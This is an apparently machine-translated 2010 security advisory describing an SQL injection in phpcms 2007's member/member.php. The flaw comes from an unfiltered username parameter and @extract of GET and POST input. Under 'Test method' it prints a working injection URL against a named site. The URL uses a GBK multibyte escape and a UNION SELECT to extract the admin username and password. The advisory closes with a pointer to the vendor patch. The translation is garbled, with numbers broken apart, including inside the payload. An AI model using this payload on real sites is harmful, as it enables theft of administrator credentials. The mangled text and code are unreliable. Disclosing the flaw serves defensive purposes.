phpcms 2 0 0 7 site management system Member. php page SQL injection vulnerability-vulnerability warning-the black bar safety net

2010-06-24T00:00:00
ID MYHACK58:62201027358
Type myhack58
Reporter 佚名
Modified 2010-06-24T00:00:00

Description

Affected version: phpcms 2 0 0 7 GBK Vulnerability description: In the member/member. php line 4, The code is as follows:

1. .............. 2. $m = $db->get_one( SELECT * FROM . TABLE_MEMBER. m , . TABLE_MEMBER_INFO. i WHERE m. userid=i. userid AND m. username= 3. $username 4. , CACHE ,8 6 4 0 0); 5. ..............

username variable without filtration enters a query, our in the which contains the include/common. inc. the php file has the following code:

1. ................ 2. @extract($_POST, EXTR_OVERWRITE); 3. @extract($_GET, EXTR_OVERWRITE); 4. ............... <reference http://www.00day.cn > Test method:

This site provides program(method)may carry offensive,for security research and teaching purposes,at your own risk! http://ssvdb.com/phpcms/member/member.php?username=luoye%cf union//select//1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,5 7,5 8,5 9,6 0,6 1,6 2,6 3,6 4,6 5//from//phpcms_member//where//userid=1/*SEBUG Safety recommendations: Manufacturers patch: PHPCMS 2 0 0 7 ---------- The current vendors have released an upgrade patch to fix this security issue, please go to the manufacturers home page download: http://www.phpcms.cn